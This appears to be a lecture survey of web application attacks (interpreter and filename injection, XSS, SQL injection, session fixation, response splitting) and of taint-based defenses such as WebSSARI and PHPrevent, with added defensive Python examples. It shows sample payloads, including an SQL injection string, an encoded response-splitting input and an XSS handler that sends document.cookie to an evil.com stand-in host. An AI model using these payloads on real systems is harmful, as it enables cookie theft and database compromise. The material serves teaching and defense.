Vulnerability Analysis of Web-based Applications

Yi Tang (Email: tangyi@ymail.com), Dec. 18, 2008

Outline
1. Current web security trend
2. Web technologies
3. Web-based attacks
4. Vulnerability analysis
5. Conclusion

Web security
• As the use of web applications for critical services has increased, attacks against them have grown as well. Several characteristics make web applications valuable targets for an attacker:
  – Web applications are often designed to be widely accessible.
  – Web applications often interface with back-end components containing sensitive data.
  – The most popular web languages are easy enough that novices can start writing their own applications.

Trend
• In the first half of 2005, Symantec catalogued 1,100 new vulnerabilities affecting web-based applications, well over half of all new vulnerabilities catalogued in that period.
• Source: Symantec Internet Security Threat Report.


Common Gateway Interface
• One of the first mechanisms that enabled dynamic content was the Common Gateway Interface (CGI).
• CGI defines a mechanism that a server can use to interact with external applications.
• Disadvantage: a new process must be created and executed for each request.
• Server-specific APIs:
  – Have a low initialization cost and can perform more general functions than CGI-based programs.
  – Are complex to program, since they require some knowledge of the server's inner workings.
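To make the CGI mechanism concrete, here is a Python sketch of a CGI-style program written as a function. Under CGI, the server hands request data to a newly started process through environment variables such as REQUEST_METHOD and QUERY_STRING. The program then writes headers, a blank line and the body to standard output. The function name handle_cgi_request and the greeting logic are hypothetical. The environment is passed in as a dict so that the sketch runs without a web server.

```python
from urllib.parse import parse_qs


def handle_cgi_request(environ: dict) -> str:
    """Build a CGI-style response (headers, blank line, body) from the
    environment variables a server sets for a newly started CGI process."""
    # CGI passes request metadata in environment variables.
    method = environ.get("REQUEST_METHOD", "GET")
    # For GET requests the parameters arrive URL-encoded in QUERY_STRING.
    params = parse_qs(environ.get("QUERY_STRING", ""))
    name = params.get("name", ["world"])[0]
    body = f"{method} request, hello {name}\n"
    # A CGI program writes its headers, an empty line, then the body.
    return "Content-Type: text/plain\r\n\r\n" + body
```

A real CGI script would call handle_cgi_request(dict(os.environ)) and print the result. Because the server launches a fresh process for every request, that startup work is repeated each time, which is the per-request cost noted above.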

[Figure: tasks a web application must handle, such as authenticating users, parameter decoding, and session management.]

Embedded Web Application Frameworks
• Today, most web applications are implemented with an approach midway between the original CGI and server-specific APIs.
• An interpreter or compiler is used to encode the application's components, and rules are defined that govern the interaction between the server and those components.
• Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python (interpreted, object-oriented, dynamically typed).

A sample PHP program
• Parameters of requests sent with the HTTP GET method are available in the $_GET array.
• Native support for sessions makes it easy to keep track of a user across different requests.
• User input is first checked using the validate function.

Attacks
• Web-based applications have fallen prey to a variety of attacks that violate different security properties.
• This survey focuses on attacks that make an application behave in unforeseen ways, disclosing sensitive information or executing commands on behalf of the attacker.
• Currently, most attacks against web applications can be traced to one class of vulnerabilities: improper input validation.
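Improper input validation is the common root cause, so below is a minimal whitelist-style validator in Python. It accepts a parameter only when the whole value matches an expected pattern, instead of trying to strip known-bad characters. The pattern (1 to 32 letters, digits or underscores) is an assumption chosen for illustration. The name validate echoes the sample PHP program, but this body is hypothetical.

```python
import re

# Hypothetical whitelist: identifiers of 1-32 letters, digits or underscores.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate(value: str) -> bool:
    """Return True only if the entire value matches the whitelist pattern."""
    return USERNAME_RE.fullmatch(value) is not None
```

Using fullmatch rather than a pattern ending in $ also rejects a value with a trailing newline, because $ can match just before a final newline.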

Interpreter Injection
• Many dynamic languages include functions that dynamically compose and interpret code. In PHP, for example:
  – include and require: include and evaluate a file as PHP code.
  – eval, and preg_replace with the /e modifier: evaluate a string as PHP code.
  – exec, passthru, system, popen, shell_exec, pcntl_exec, proc_open and the backtick operator: execute their input as a shell command.
• The injected code runs on the server.
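Python has functions in the same class (eval, exec, subprocess with shell=True). The analogue below is an illustration and does not come from the survey. It shows eval executing attacker-supplied code, while the standard ast.literal_eval accepts only literal values. The function names are hypothetical.

```python
import ast


def unsafe_parse(user_input: str):
    # Interpreter injection: eval runs any Python expression the user sends.
    return eval(user_input)


def safe_parse(user_input: str):
    # ast.literal_eval accepts only literals (numbers, strings, lists, ...);
    # anything else, such as a function call, is rejected.
    try:
        return ast.literal_eval(user_input)
    except (ValueError, SyntaxError):
        return None


# Attacker-chosen "parameter": calls a function instead of being plain data.
payload = "__import__('os').getcwd()"
```

unsafe_parse(payload) imports os and runs getcwd() on the server. safe_parse(payload) returns None, while safe_parse("[1, 2, 3]") still returns the list.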

Sample of interpreter injection in Double Choco Latte
[Figure: attack URL and server code.] The server does not fully filter the menuAction parameter before using it.

Filename Injection
• Most web languages allow files to be included dynamically, either to interpret their content or to present them to users.
  – E.g., to generate different page content depending on a user's preferences, such as for internationalization purposes.
• Because PHP allows the inclusion of remote files, the code added to the application can be hosted on a site under the attacker's control.

A filename injection vulnerability in txtForum
• In txtForum, pages are divided into parts (e.g., header, footer, forum view) and can be customized with different "skins", which are different combinations of colors, fonts, and other presentation parameters.
• Setting the skin to the value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl.
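One common mitigation is to map the user-supplied skin name through a whitelist, so the raw value never ends up in a path or URL. The Python sketch below assumes the set of installed skins is known in advance. The skin names, the directory /var/www/forum/skins and the function template_path are hypothetical and do not come from txtForum.

```python
from pathlib import Path

# Hypothetical whitelist of installed skins and their template directory.
ALLOWED_SKINS = {"default", "dark", "classic"}
SKIN_ROOT = Path("/var/www/forum/skins")


def template_path(skin: str, part: str = "header.tpl") -> Path:
    """Map a user-chosen skin to a local template file. Anything that is
    not a known skin name (a URL, a '../' sequence, ...) falls back to
    the default skin."""
    if skin not in ALLOWED_SKINS:
        skin = "default"
    return SKIN_ROOT / skin / part
```

In PHP, turning off the allow_url_include setting also prevents include and require from loading remote URLs. The whitelist is still needed to block local path manipulation.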

Cross-Site Scripting (XSS)
• In this attack, an attacker forces a client, typically a web browser, to execute attacker-supplied code, typically JavaScript, which runs in the context of a trusted web site.
• Sample: http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
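The usual countermeasure is to encode user data for the HTML context before writing it into the page. Below is a minimal Python sketch of a hypothetical welcome handler that uses the standard html.escape function.

```python
import html


def welcome_page(name: str) -> str:
    # html.escape turns <, >, & and (with quote=True) " and ' into
    # character references, so the browser shows them as text.
    return f"<p>Welcome, {html.escape(name, quote=True)}!</p>"
```

With the sample payload as the name, the page contains &lt;script&gt;alert(document.cookie)&lt;/script&gt;. The browser displays this as text and does not execute it.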

Impact of XSS attacks
• XSS is not a harmless flaw!
• Access to authentication credentials for the web application
  – Cookies, username and password
• Normal users
  – Access to personal data (credit card, bank account)
  – Access to business data (bid details, construction details)
  – Misuse of the account (ordering expensive goods)
• Highly privileged users
  – Control over the web application
  – Control of, or access to, the web server machine
  – Control of, or access to, back-end and database systems

SQL Injection
• A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.
• This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application.
    $activate = $_GET["activate"];
    $result = dbquery("SELECT * FROM new_users " . "WHERE user_code = '$activate'");
• If the activate parameter is set to the string ' OR 1=1 --, the query becomes
    SELECT * FROM new_users WHERE user_code = '' OR 1=1 --'
  and returns the content of the entire new_users table.
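This example can be reproduced with Python's built-in sqlite3 module and an in-memory table. The table contents are made up for illustration. The second function shows the standard fix, a parameterized query, in which the driver passes the value as data and never as SQL text.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE new_users (user_code TEXT, name TEXT)")
conn.executemany("INSERT INTO new_users VALUES (?, ?)",
                 [("abc123", "alice"), ("def456", "bob")])


def activate_unsafe(activate: str):
    # Vulnerable: user data is pasted directly into the SQL text.
    query = "SELECT * FROM new_users WHERE user_code = '" + activate + "'"
    return conn.execute(query).fetchall()


def activate_safe(activate: str):
    # Parameterized query: the ? placeholder is bound to the value as data.
    return conn.execute("SELECT * FROM new_users WHERE user_code = ?",
                        (activate,)).fetchall()


payload = "' OR 1=1 --"
```

activate_unsafe(payload) returns every row. activate_safe(payload) returns an empty list because no user_code equals that string.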


Session Hijacking
• HTTP is a stateless protocol: no built-in mechanism allows an application to maintain state throughout a session.
• Session state can be maintained in different ways:
  – It can be encoded in a document transmitted to the user, e.g., in a cookie or in HTML hidden form fields, and sent back as part of later requests.
    Problem: the cookie or hidden form fields may be changed by dishonest users.
  – Each user is assigned a unique session ID.
    Problem: session fixation.

Session Hijacking
• Session fixation: the attacker sets a user's session ID to one known to him, for example by sending the user an email with a link that contains a particular session ID:
    http://[target]/login.php?sessionid=1234
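The standard defense is to issue a new, unpredictable session ID when the user authenticates. That way an ID chosen by the attacker is never promoted to an authenticated session. Below is a Python sketch with a hypothetical in-memory session store, using the standard secrets module.

```python
import secrets

sessions = {}  # session ID -> session data (hypothetical in-memory store)


def new_session_id() -> str:
    # 32 random bytes, URL-safe: infeasible for an attacker to guess.
    return secrets.token_urlsafe(32)


def login(old_session_id: str, username: str) -> str:
    """After successful authentication, discard the pre-login ID (which an
    attacker may have fixed, e.g. sessionid=1234) and issue a fresh one."""
    data = sessions.pop(old_session_id, {})
    data["user"] = username
    fresh_id = new_session_id()
    sessions[fresh_id] = data
    return fresh_id


# Example: a pre-login session whose ID the attacker chose via the link.
sessions["1234"] = {"lang": "en"}
```

After login("1234", "alice"), the ID 1234 no longer exists. The session data survives only under the new random ID.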

Response Splitting
• The attacker is able to set the value of an HTTP header field so that the resulting response stream is interpreted by the attack target as two responses.
• To perform response splitting, the attacker must be able to inject data containing the header termination characters (CR LF, encoded as %0d%0a) and the beginning of a second header.
• This is usually possible when user data is used, unsanitized, to determine the value of an HTTP header.

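Response Splitting
    <% response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang")); %>
• With lang=en_US, the response contains the header:
    Location: http://vulnerable.com/by_lang.jsp?lang=en_US
• However, if lang is set to:
    dummy%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>New document</html>
  the decoded CR LF sequences end the first response after a Content-Length: 0 header. The rest of the stream is read as a second response (HTTP/1.1 200 OK ... <html>New document</html>) whose content the attacker controls.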
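A minimal countermeasure rejects carriage return and line feed characters in any user-controlled value before it is placed in a header, and percent-encodes the value otherwise. It is sketched here in Python rather than JSP for brevity. The function names are hypothetical. lang is assumed to be the already URL-decoded request parameter.

```python
from urllib.parse import quote, unquote


def header_value_is_safe(value: str) -> bool:
    # A CR or LF would end the header line; whatever follows would be read
    # as further headers or as a second response.
    return "\r" not in value and "\n" not in value


def redirect_location(lang: str) -> str:
    """Build the redirect target for by_lang.jsp from the decoded lang."""
    if not header_value_is_safe(lang):
        raise ValueError("CR/LF not allowed in a header value")
    # Percent-encoding the value as well keeps it inert inside the URL.
    return "/by_lang.jsp?lang=" + quote(lang, safe="")


# The malicious parameter from the slide, after URL decoding (shortened).
attack = unquote("dummy%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK")
```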

Response Splitting
• Response splitting is often related to web cache poisoning.
• Two conditions:
  – a caching proxy server interprets the response stream as containing two documents, and
  – associates the second one with the original request.
• If both hold, an attacker can insert into the proxy's cache a page of his choice, associated with a URL in the vulnerable application.

Vulnerability analysis
• Vulnerability analysis is the process of assessing the security of an application by auditing either its code or its behavior for possible security problems.
• Vulnerabilities in web applications can be identified by following one of two orthogonal detection approaches: the negative (vulnerability-based) approach and the positive (behavior-based) approach.

Detection approach
• Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications to identify instances of the modeled vulnerabilities.
• Positive approach: builds models of the normal behavior of an application (e.g., using machine-learning techniques) and then analyzes the application's behavior to identify any abnormality that might be caused by a security violation.
• Two fundamental techniques can be used to perform the analysis: static analysis and dynamic analysis.

• Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. It does not require the application to be deployed and executed.
• Dynamic analysis: consists of a series of checks that detect vulnerabilities and prevent attacks at run time. It is less prone to false positives, since it observes actual executions.
• In practice, hybrid approaches that mix static and dynamic techniques are frequently used to combine the strengths and minimize the limitations of the two.

Outline
1. Current web security trend
2. Web technologies
3. Web-based attacks
4. Vulnerability analysis
   1. Negative approach
   2. Positive approach
5. Conclusion

Negative approach: taint propagation
• Most negative approaches assume that vulnerabilities are the result of insecure data flow in applications.
• They attempt to identify when untrusted user input propagates to security-critical functions (sinks) without being properly checked and sanitized.
• Taint propagation: data from input sources is marked as tainted, and its propagation throughout the program is traced to check whether it can reach sinks.
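A toy version of taint propagation can be written in Python by marking untrusted strings with a str subclass. This is a hypothetical illustration of the idea, not the mechanism of any tool in this survey. Only + concatenation propagates the mark here. Other operations, such as slicing or f-strings, silently drop it, and this is exactly the kind of imprecision real taint trackers must handle.

```python
class Tainted(str):
    """A string marked as coming from an untrusted source."""

    def __add__(self, other):
        # tainted + anything -> tainted
        return Tainted(str.__add__(self, other))

    def __radd__(self, other):
        # anything + tainted -> tainted (called first because Tainted is
        # a subclass of str that overrides the reflected method)
        return Tainted(str.__add__(other, self))


def source(value: str) -> Tainted:
    # Source: everything read from the request is tainted.
    return Tainted(value)


def sanitize(value: str) -> str:
    # Sanitizer: returns a plain (untainted) str. Doubling single quotes is
    # a simplified SQL-literal escape used only for this illustration.
    return str(value).replace("'", "''")


def sink_allows(query: str) -> bool:
    # Check at the sink: only untainted data may reach it.
    return not isinstance(query, Tainted)
```

"SELECT '" + source("x") + "'" stays tainted and is refused at the sink. The same query built from sanitize(source("x")) is a plain string and passes.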

Negative static approaches
• Static analysis can be applied before deployment, and it does not require modification of the deployment environment.
• Current tools focus on applications written in PHP and Java.
• The analysis may require the source code of the web site.

WebSSARI (WWW'04)
• WebSSARI is one of the first works to apply taint propagation analysis to web security.
• WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.
• The tool uses a flow-sensitive, intra-procedural analysis based on a lattice model and typestate.
• Typestate: PHP is extended with two types, tainted and untainted, and the tool keeps track of the typestate of variables.
• To untaint tainted data, the data has to be processed by a sanitization routine or cast to a safe type.

• It relies on three predefined files:
  – a file with preconditions for all sensitive functions (the sinks),
  – a file listing known sanitization functions, used to untaint data,
  – a file specifying all possible sources of untrusted input.
• When the tool finds that tainted data reaches a sink, it automatically inserts sanitization routines.

Typestate
    if (A) { A = X; } else { if (B) { A = Y; } else { A = Z; } }
    echo(A);
    if (C) { ...
• At every program point, the algorithm keeps a static invariant representing the most dangerous possible state at that point.
• [Figure: control flow graph of this code annotated with typestates (T = tainted, U = untainted). X and Z are tainted and Y is untainted, so after the branches merge, the state of A at echo(A) is LUB(T, U, T) = T.]

Typestate
• Typestate offers a balance between precision and cost:
  – Maintaining a typestate for every diverging path increases precision but induces memory cost.
  – Merging typestates at execution merge points limits memory cost but induces imprecision and denies counterexample support.
• WebSSARI incorporates flow-sensitive typing based on typestate.
• [Figure: the control flow graph of the previous example, drawn once with a typestate per path and once with typestates merged at join points.]
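The merge step from the example can be written out directly. The Python sketch below uses names of our choosing. It models the two-point lattice untainted < tainted and computes the typestate of A at the merge point before echo(A) as the least upper bound of the branch states, which reproduces LUB(T, U, T) = T. It does not model the per-path alternative.

```python
from enum import IntEnum


class Taint(IntEnum):
    """Two-point lattice: UNTAINTED < TAINTED."""
    UNTAINTED = 0
    TAINTED = 1


def lub(*states: Taint) -> Taint:
    # Least upper bound: the most dangerous state reaching the merge point.
    return max(states)


# Typestates from the example: X and Z are tainted, Y is untainted.
env = {"X": Taint.TAINTED, "Y": Taint.UNTAINTED, "Z": Taint.TAINTED}

# Each branch assigns a different variable to A; at the merge point before
# echo(A), only the join of the three branch states is kept.
state_of_A = lub(env["X"], env["Y"], env["Z"])
```

Since state_of_A is TAINTED and echo is a sink, this is the point where a sanitization routine would be required.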

Runtime Protection
• Sanitization routines are automatically inserted just before vulnerable function calls.
• Depending on the vulnerable function, one of the following three routines is inserted:
  – HTML output sanitization
  – Database command sanitization
  – System command sanitization
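Here is a simplified picture of such inserted guards, written in Python with hypothetical names. Each sink category is paired with a sanitization routine that runs just before the sink is called. The SQL routine (doubling single quotes) is a simplification that is not safe for every database configuration. Parameterized queries remain the preferred fix.

```python
import html
import shlex

# Hypothetical mapping from sink category to a sanitization routine.
SANITIZERS = {
    "html": lambda s: html.escape(s, quote=True),  # HTML output
    "sql": lambda s: s.replace("'", "''"),         # SQL string literal
    "shell": shlex.quote,                          # one POSIX shell argument
}


def guarded_call(sink_kind: str, sink, value: str):
    """Sanitize value for the given sink category, then call the sink,
    mimicking a routine inserted just before a vulnerable function call."""
    return sink(SANITIZERS[sink_kind](value))
```

For example, guarded_call("shell", str, "a; rm -rf /") yields 'a; rm -rf /' in single quotes, so a shell would treat it as one argument.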


Problems of WebSSARI
• It uses an intra-procedural algorithm and thus only models information flow that does not cross function boundaries (Xie, USENIX Security '06).
• All dynamic variables and arrays are considered tainted, which reduces the accuracy of the analysis.
• It cannot accurately track arrays, aliases, and object-oriented code (Pixy, Oakland '06).

Summary
• Static analysis depends heavily on language-specific parsers. This is not generally a problem for general-purpose languages.
• Web applications, however, use dynamic scripting languages that make it easy to use complex data structures, such as arrays and hashes, which are hard to track.
• One of the main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecision.
• Precise evaluation of sanitization routines is more difficult: checking them against a regular expression alone may not be enough.

Dynamic negative approach
• Dynamic negative techniques are also based on taint analysis: untrusted sources, sensitive sinks, and taint propagation also need to be modeled.
• Instead of analyzing the source code, the program or interpreter is extended to collect information, and tainted data is tracked during execution.
• Perl's taint mode: when the Perl interpreter is invoked with the -T option, it ensures that no data obtained from the outside environment can be used in security-critical functions unless it is first untainted, e.g., by extracting it through a regular-expression match (too conservative).

"Automatically Hardening Web Applications Using Precise Tainting", SEC'05
• Proposes a modification of the PHP interpreter that dynamically tracks tainted data in PHP programs.
• Fully automated
• Aware of application semantics
• Replaces the PHP interpreter with a modified interpreter that:
  – keeps track of which information comes from untrusted sources (precise tainting)
  – checks how untrusted input is used

[Figure: PHPrevent architecture, showing the client, the web server (HTTP server and PHP interpreter with PHPrevent), file.php, the file system, the database, and system APIs, connected by numbered steps 1 to 8.]

Coarse-Grain Tainting
• Provided by many scripting languages (Perl, Ruby)
• Untrusted input is tainted.
• Everything touched by tainted data becomes tainted:
    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";
  The entire $query string is tainted.

Precise Tainting
• Untrusted input is tainted.
• Taint markings are maintained at the character level.
  – Propagation depends on the semantics of the program.
• Only data that actually comes from untrusted input is tainted:
    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";
  With a malicious $user and an empty $pwd, this becomes:
    $query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''";
  Only the characters that came from $user carry taint marks.
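Character-level taint markings can be sketched with a small Python class that stores one boolean per character and concatenates the masks along with the text. TStr is a hypothetical illustration of the idea, not PHPrevent's implementation, which works inside the PHP interpreter. The coarse_tainted method shows the coarse-grain view for comparison.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TStr:
    """String with a per-character taint mask (True = from untrusted input)."""
    text: str
    mask: tuple

    @staticmethod
    def trusted(text: str) -> "TStr":
        return TStr(text, (False,) * len(text))

    @staticmethod
    def untrusted(text: str) -> "TStr":
        return TStr(text, (True,) * len(text))

    def __add__(self, other: "TStr") -> "TStr":
        # Concatenation keeps each character's own marking.
        return TStr(self.text + other.text, self.mask + other.mask)

    def tainted_part(self) -> str:
        # Precise view: only the characters that came from untrusted input.
        return "".join(c for c, t in zip(self.text, self.mask) if t)

    def coarse_tainted(self) -> bool:
        # Coarse-grain view: one tainted character taints the whole string.
        return any(self.mask)
```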

Precise Checking
• Wrappers around PHP functions handle updating and checking the precise taint information.
• Conservative: no false negatives, while minimizing false positives.
• Behavior changes only when an attack is likely.

Preventing SQL Injection
• Parse the query with an SQL parser to identify interpreted text.
• Disallow SQL keywords or delimiters in interpreted text that is tainted:
  – the query is not sent to the database;
  – an error response is returned.
    "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''"
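Here is a rough Python sketch of this check. It assumes the taint information from precise tainting is available as one boolean per character of the query. A hypothetical mini-lexer stands in for a real SQL parser and only knows single-quoted literals. The keyword and delimiter lists are illustrative assumptions, not PHPrevent's.

```python
import re

# Hypothetical, deliberately small keyword and delimiter lists.
SQL_KEYWORDS = {"OR", "AND", "UNION", "SELECT", "DROP", "INSERT", "UPDATE", "DELETE"}
DELIMITERS = set("';-#/*")


def build(*parts):
    """Concatenate (text, is_tainted) pairs into a query and its taint mask."""
    query = "".join(text for text, _ in parts)
    mask = [t for text, t in parts for _ in text]
    return query, mask


def interpreted_tainted_text(query: str, mask: list) -> str:
    """Collect tainted characters that SQL would interpret, i.e. those outside
    single-quoted literals. A quote that opens or closes a literal counts as
    interpreted; an escaped quote ('') inside a literal is data."""
    out, in_literal, i = [], False, 0
    while i < len(query):
        ch = query[i]
        if in_literal and ch == "'" and query[i + 1:i + 2] == "'":
            i += 2  # escaped quote stays inside the literal
            continue
        if ch == "'":
            in_literal = not in_literal
            if mask[i]:
                out.append(ch)
        elif not in_literal and mask[i]:
            out.append(ch)
        i += 1
    return "".join(out)


def is_attack(query: str, mask: list) -> bool:
    # Reject when tainted interpreted text contains a delimiter or keyword.
    text = interpreted_tainted_text(query, mask)
    words = {w.upper() for w in re.findall(r"[A-Za-z_]+", text)}
    return bool(DELIMITERS & set(text)) or bool(SQL_KEYWORDS & words)
```

A benign user name stays entirely inside a literal, so no tainted text is interpreted. In the slide's query, the tainted quote closes the literal early, so ' OR 1 = 1; -- ' becomes interpreted text and the query is refused.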

Preventing PHP Injection
• Disallow tainted data in functions that treat input strings as PHP code or manipulate system state.
• Place wrappers around these functions to enforce this rule.
• The phpBB attack is prevented by wrappers around preg_replace.
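The wrapper idea can be illustrated in Python with a decorator. The Tainted marker class and the function names are hypothetical. In PHPrevent, the wrappers live inside the modified PHP interpreter and consult its character-level taint information rather than a marker type.

```python
import functools


class Tainted(str):
    """Marks a string that came from an untrusted source (hypothetical)."""


def is_tainted_call(*args, **kwargs) -> bool:
    # True if any positional or keyword argument carries the taint mark.
    return any(isinstance(a, Tainted) for a in (*args, *kwargs.values()))


def refuse_tainted(func):
    """Wrap a dangerous function so that it refuses tainted arguments."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if is_tainted_call(*args, **kwargs):
            raise PermissionError(f"tainted input passed to {func.__name__}")
        return func(*args, **kwargs)
    return wrapper


# Application code calls the wrapped version instead of the raw builtin.
guarded_eval = refuse_tainted(eval)
```

guarded_eval("1 + 2") returns 3. guarded_eval(Tainted("...")) raises PermissionError before any code is evaluated.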

Preventing Cross-Site Scripting
• Wrappers around output functions
• Buffer the output and then parse the tainted output with HTML Tidy.
• The defense uses precise tainting information to identify web page output generated from untrusted sources.
• Dangerous content is determined by examining the HTML grammar.
• Dangerous content is sanitized by removing tags:
    <b>Hello</b>  → safe
    <b onmouseover='location.href="http://evil.com/steal.php?" + document.cookie'>Hello</b>  → unsafe
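Python's standard html.parser module can sketch the two steps of this defense. The first step decides whether a tainted fragment contains script-capable markup. The second step, applied only if it does, removes the tags and escapes the remaining text. The rule set (script elements, on* attributes, javascript: URLs) is an illustrative assumption and far from complete. PHPrevent itself uses HTML Tidy and the HTML grammar.

```python
import html
from html.parser import HTMLParser


class DangerFinder(HTMLParser):
    """Flags markup that can run script: <script> elements, on* event
    attributes and javascript: URLs (a deliberately small rule set)."""

    def __init__(self):
        super().__init__()
        self.dangerous = False
        self.text = []  # character data, kept in case tags must be removed

    def handle_starttag(self, tag, attrs):
        # HTMLParser reports tag and attribute names in lower case.
        if tag == "script":
            self.dangerous = True
        for name, value in attrs:
            if name.startswith("on"):
                self.dangerous = True
            if value and value.strip().lower().startswith("javascript:"):
                self.dangerous = True

    def handle_data(self, data):
        self.text.append(data)


def sanitize_tainted(fragment: str) -> str:
    """Return a tainted HTML fragment unchanged if it looks harmless;
    otherwise strip all tags and escape the remaining text."""
    finder = DangerFinder()
    finder.feed(fragment)
    finder.close()
    if not finder.dangerous:
        return fragment
    return html.escape("".join(finder.text))
```

With the two fragments from the slide, <b>Hello</b> passes through unchanged. The onmouseover version is reduced to the plain text Hello.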

Summary of the dynamic negative method
• A modified interpreter can be applied to all web applications, since all required information is available from the execution itself. Further, no complex analysis (such as alias analysis) is required.
• However, there is no guarantee that all cases are covered, since only the paths that are actually executed are checked.

Summary of the negative method
• If taint propagation is done statically, the precision depends heavily on the ability to deal with the complexities of dynamic language features. Precise evaluation of sanitization routines is especially important.
• If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability, and performance arise.
